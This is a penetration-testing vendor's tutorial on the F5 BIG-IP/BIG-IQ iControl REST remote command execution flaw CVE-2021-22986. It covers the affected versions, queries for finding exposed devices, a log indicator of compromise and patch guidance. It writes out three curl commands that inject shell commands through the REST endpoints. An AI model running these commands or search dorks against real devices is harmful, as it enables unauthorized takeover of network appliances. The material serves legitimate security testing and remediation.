Hacking tutorials

How to detect CVE-2021-22986 RCE with Pentest-Tools.com

Publisher
Pentest-Tools.com
Updated at
Article tags

As a pentester, when you see a major critical vulnerability persist for months in unpatched systems (like Log4Shell), you have a responsibility to help others understand its severity and how they can fix it. This is exactly why this article exists.

We saw a lot of vulnerable and unpatched systems out in the wild, even if the security flaw was discovered around March 2021, so we couldn’t just stand on the sidelines.

Discovered around March 2021, CVE-2021-22986 still keeps the door open for attackers in many vulnerable systems in the wild. So this guide is dedicated to how you can search for vulnerable hosts, how you can exploit the vulnerability, and the solution to mitigate it.

What is F5 iControl?

The F5 iControl is a REST-based API that allows you to execute multiple actions for BIG-IP devices that you manage, such as changing the system configuration.

F5 iControl REST-based API architecture(Source: F5 iControl Whitepaper)

What is CVE-2021-22986?

Let’s talk about the context of the vulnerability. It was discovered in early spring 2021 and, in spite of months have passed since a lot of devices are still vulnerable and many threat actors are actively exploiting this vuln in the wild.

But what makes it so attractive to malicious hackers?

The vulnerability has a CVSS score of 9.8 and was categorized as “Critical” because you can achieve full device compromise through Remote Command Execution. Even worse, you can do all of this unauthenticated. What’s more, the BIG-IP devices in Appliance mode are also vulnerable.

To make matters worse, it was also observed that a Mirai variant has been actively exploiting this vulnerability.

We are now observing the Mirai variant from https://t.co/ZDTVwtdYlq attempting to exploit CVE-2021-22986, an unauthenticated RCE in F5 BIG-IP & BIG-IQ products, and CVE-2020-28188.

IOCs for the new activity available at: https://t.co/bc0IySEAEk pic.twitter.com/ZsUqxq60XO

— Unit 42 (@Unit42_Intel) March 19, 2021

Vulnerable products and versions

Here’s the list of affected products and their versions for the CVE-2021-22986 RCE flaw so you can check your tech stack for this vuln:

  • F5 BIG-IP Devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO):

    • 12.1.0-12.1.5.2

    • 13.1.0-13.1.3.5

    • 14.1.0-14.1.3.1

    • 15.1.0-15.1.2

    • 16.0.0-16.0.1

  • F5 BIG-IQ Centralized Management:

    • 6.0.0-6.1.0

    • 7.0.0-7.0.0.1

    • 7.1.0-7.1.0.2

Now that you have the essential details you need, let’s take a look at how to detect and exploit it using Pentest-Tools.com.

How to find systems potentially impacted by CVE-2021-22986

I’m about to showcase three main ways to find hosts and devices that may be affected by the CVE-2021-22986 vulnerability.

Using Shodan

At the time of writing this article, there were at least 6,000 devices found through Shodan.

F5 BIG-IP devices shodan

You can use the following query to discover F5 BIG-IP potentially devices vulnerable to this unauthenticated RCE vuln:

http.title:”BIG-IP®-Redirect”

Using Google Dorks

F5 BIG-IP devices use web-based interfaces, so you can use Google Dorks to sniff out F5 hosts with the following search queries:

  • inurl:my.logout.php3?

  • inurl:”/my.policy” big-ip

  • intitle:”BIG-IP logout page”

  • intext:”Thank you for using BIG-IP.”

  • intext:”This product is licensed from F5 Networks.”

  • intext:”F5 Networks. All rights reserved”

 

Google Dorks page result

Using PublicWWW

PublicWWW is a search engine you can use to hunt for websites based on source code content, response headers, cookies, and technology used. You can use the same dorks I just mentioned and also a few more details such as:

  • “my.logout.php3”

  • “/my.policy”

  • “BIG-IP logout page”

  • “Thank you for using BIG-IP.”

  • “This product is licensed from F5 Networks.”

  • “F5 Networks. All rights reserved”

  • “Set-Cookie: F5_ST”

F5 BIG-IP devices google dorksAdd this tool to your workflow by bookmarking https://publicwww.com/ 

How to exploit CVE-2021-22986 in ethical hacking engagements

In order to exploit the CVE-20212-22986, you must follow the below steps:

  1. curl -ksu admin: https://<HOST>/mgmt/tm/access/bundle-install-tasks -d ‘{“filePath”:”<COMMAND>”}’

  2. curl -ksu admin: https://<HOST>/mgmt/tm/access/bundle-install-tasks -d ‘{“filePath”:”<COMMAND>”}’

  3. curl -su admin: -H “Content-Type: application/json” http://<HOST>:8100/mgmt/tm/util/bash -d ‘{“command”:”run”,”utilCmdArgs”:”-c <COMMAND>”}’

If you’re curious to try another, much faster exploitation tactic, keep reading and watch the demo below.

Known Indicators of Compromise (IoCs) for CVE-2021-22986

According to F5, you should look (manually) for the following entry in the /var/log/restjavad*.log file:

“X-F5-Auth-Token doesn’t have value”

How to detect and exploit CVE-2021-22986 using Pentest-Tools.com

The fastest and no-hassle way to validate that CVE-2021-22986 is exploitable on your target is to use Sniper Automatic Exploiter, the auto-attacker on Pentest-Tools.com.

The tool simulates real-world exploitation and attack techniques automatically:

  • It scans for open ports, collecting data about the protocol, type of service and version

  • It fingerprints web services to determine the type of web application running and the tech stack behind it

  • It looks for compatible exploits 

  • It checks if the target is indeed vulnerable – without extracting any data at this stage

  • Once it gains RCE, Sniper automatically extracts all the artefacts (current and local users, system information, running processes, network configuration, etc.), which you’ll get in the output report

  • It does clean-up, so the target is left unaltered.  

As you can see from the demo, this all happens in literally a minute which is a massive gain compared to manual exploitation, especially when you’re pressed for time in a pentest (and when doesn’t that happen?).

How to detect F5 IControl REST Unauthenticated RCE (CVE-2021-22986) with Pentest-Tools.com

If you need a report with findings for the F5 iControl REST Unauthenticated RCE, you can use the Pentest-Tools.com Network Vulnerability Scanner. Run it on your target and get a full, ready-to-use report with rich details that you can share with colleagues and clients:

F5 iControl REST Unauthenticated RCE finding

How to mitigate CVE-2021-22986

First, it is recommended to install a patched version for your devices:

  • BIG-IP 16.0.1.1+

  • BIG-IP 15.1.2.1+

  • BIG-IP 14.1.4+

  • BIG-IP 13.1.3.6+

  • BIG-IP 12.1.5.3+

  • BIG-IQ 7.1.0.3+

  • BIG-IQ 7.0.0.2+

If for some reason, you can’t apply this patch, then you should restrict access to the iControl REST interface for any IP address except for your administrator’s one.

Working together to cope with the landslide

With a constant flow of vulnerabilities that keep security specialists in firefighting mode, it’s really difficult to keep up. That’s why we, at Pentest-Tools.com, believe in helping each other by sharing expertise, methods, and insights while supporting collaboration in a way that truly makes a difference. It’s not easy work but it is our work and we’re committed to doing the best job we can.

If there’s a specific guide you need that you’re missing to help you get ahead in your role and make a bigger impact at work – and in the industry – let us know!

Get fresh security research

In your inbox. (No fluff. Actionable stuff only.)

I can see your vulns image

Related articles

Suggested articles

Discover our ethical hacking toolkit and all the free tools you can use!

Create free account

Footer

© 2013-2024 Pentest-Tools.com

Pentest-Tools.com has a LinkedIn account it's very active on

Join over 45,000 security specialists to discuss career challenges, get pentesting guides and tips, and learn from your peers. Follow us on LinkedIn!

Pentest-Tools.com has a YouTube account where you can find tutorials and useful videos

Expert pentesters share their best tips on our Youtube channel. Subscribe to get practical penetration testing tutorials and demos to build your own PoCs!

G2 award badge

Pentest-Tools.com recognized as a Leader in G2’s Spring 2023 Grid® Report for Penetration Testing Software. Discover why security and IT pros worldwide use the platform to streamline their penetration and security testing workflow.

OWASP logo

Pentest-Tools.com is a Corporate Member of OWASP (The Open Web Application Security Project). We share their mission to use, strengthen, and advocate for secure coding standards into every piece of software we develop.